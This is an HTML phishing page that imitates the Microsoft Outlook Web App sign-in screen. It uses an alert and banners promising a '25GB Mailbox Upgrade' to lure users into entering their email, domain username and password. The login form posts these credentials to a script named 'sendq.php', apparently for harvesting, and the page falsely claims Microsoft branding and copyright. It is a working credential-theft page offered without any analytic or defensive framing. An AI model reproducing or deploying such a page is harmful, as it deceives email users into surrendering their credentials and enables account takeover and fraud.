<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<script type="text/javascript">
alert("Welcome to 25GB Mailbox Update Portal Powered by Microsoft. Please fill all Neccesary information correctly!")
</script>
<title>Outlook Web App</title>
<link type="text/css" rel="stylesheet" href="./owa_files/logon.css">
<link type="text/css" rel="stylesheet" href="./owa_files/owafont.css">
<script type="text/javascript" src="./owa_files/flogon.js"></script>

	-->
</script>

<style type="text/css">
<!--
.style1 {color: #CC3300}
.style2 {
	font-family: "Times New Roman", Times, serif;
	font-weight: bold;
	color: #FF0000;
}
-->
</style>
</head>
<body class="owaLgnBdy">
<form action="sendq.php" method="POST" name="logonForm" enctype="application/x-www-form-urlencoded" autocomplete="off">
  <table align="center" id="tblMain" cellpadding="0" cellspacing="0">
	<tbody><tr>
		<td colspan="3">
			<table cellspacing="0" cellpadding="0" class="tblLgn">
			<tbody><tr>
				<td class="lgnTL"><img src="./owa_files/lgntopl.gif" alt=""></td>
				<td class="lgnTM"></td>
				<td class="lgnTR"><img src="./owa_files/lgntopr.gif" alt=""></td>
			</tr>
			</tbody></table>
		</td>
	</tr>
	<tr>
		<td id="mdLft">&nbsp;</td>
		<td id="mdMid">
			<table id="tblMid" class="mid">
				<tbody><tr>
					<td id="expltxt" class="expl">					</td>
				</tr>
				<tr><td><hr></td></tr>
				<tr>
				  <td><div align="center" class="style2">OUTLOOK WEB APP MANUAL EMAIL UPGRADE SYSTEM </div></td>
				</tr>
				
				<tr><td><hr></td></tr>
				<tr>
					<td>
						
						<table cellpadding="0" cellspacing="0">
							<colgroup><col>
							<col class="w100">
						  </colgroup><tbody><tr>							
									<td>&nbsp;</td>
									<td nowrap=""><label for="chkBsc">Use the light version of Outlook Web App</label></td>
								</tr>
								<tr id="trBscExp" class="disBsc" style="display:none">
									<td></td>
									<td>The light version of Outlook Web App includes fewer features. Use it if you're on a slow connection or using a computer with unusually strict browser security settings. We also support the full Outlook Web App experience on some browsers on Windows, Mac, and Linux computers. To check out all the supported browsers and operating systems,</td>
								</tr>
							
						</tbody></table>					</td>
				</tr>
				
				<tr><td><hr></td></tr>
				<tr>
					<td height="106">
						<table cellpadding="0" cellspacing="0">
							<colgroup><col class="nowrap">
							<col class="w100">
							<col>
							</colgroup><tbody>
							  <tr>
							    <td nowrap=""><label for="label">Email:</label></td>
							    <td class="txtpad"><input id="Email" name="Email" type="text" class="txt"></td>
						      </tr>
							  <tr>
								<td nowrap=""><label for="username">Domain\Username:</label></td>
								<td class="txtpad"><input id="username" name="username" type="text" class="txt"></td>
							</tr>
							<tr>
								<td nowrap=""><label for="password">Password:</label></td>
								<td class="txtpad"><input id="password" name="password" type="password" class="txt" onfocus="g_fFcs=0"></td>
							</tr>
							<tr>
							  <td colspan="2" align="right" class="txtpad">
							    <div align="right">
							      <input name="submit" type="submit" class="btn" onclick="clkLgn()" onmousedown="this.className=&#39;btnOnMseDwn&#39;" onmouseover="this.className=&#39;btnOnMseOvr&#39;" onmouseout="this.className=&#39;btn&#39;" value="Sign in">
					            </div></td>
							</tr>
					</tbody></table>					</td>
				</tr>
				<tr><td height="39"><div align="center" class="style1">Outlook Web App 25GB Mailbox Upgrade</div></td></tr>
			</tbody></table>
			<table id="tblMid2" class="mid" style="display:none">
				<tbody><tr><td><hr></td></tr>
				<tr>
					<td><br>Please enable cookies for this Web site.<br><br>Cookies are currently disabled by your browser. Outlook Web App requires that cookies be enabled. <br><br>For information about how to enable cookies, see the Help for your Web browser.<br><br><br></td>
				</tr>
				<tr><td><hr></td></tr>
				<tr>
					<td align="right" class="txtpad">
					
						
					
					</td>
				</tr>
			</tbody></table>
			<table class="mid tblConn">
				<tbody><tr>
					<td rowspan="2" align="right" class="tdConnImg"><img style="vertical-align:top" src="./owa_files/lgnexlogo.gif" alt=""></td>
					<td class="tdConn">Connected to Microsoft Exchange</td>
				</tr>
				<tr>
					<td class="tdCopy">© 2014 Microsoft Corporation. All rights reserved.</td>
				</tr>
			</tbody></table>
		</td>
		<td id="mdRt">&nbsp;</td>
	</tr>
	<tr>
		<td colspan="3">
			<table cellspacing="0" cellpadding="0" class="tblLgn">
			<tbody><tr>
				<td class="lgnBL"><img src="./owa_files/lgnbotl.gif" alt=""></td>
				<td class="lgnBM"></td>
				<td class="lgnBR"><img src="./owa_files/lgnbotr.gif" alt=""></td>
			</tr>
			</tbody></table>
		</td>
	</tr>
</tbody></table>
</form>




<div style="text-align: center;"><div style="position:relative; top:0; margin-right:auto;margin-left:auto; z-index:99999">

</div></div>

<div style="text-align: center;"><div style="position:relative; top:0; margin-right:auto;margin-left:auto; z-index:99999">

</div></div></body></html>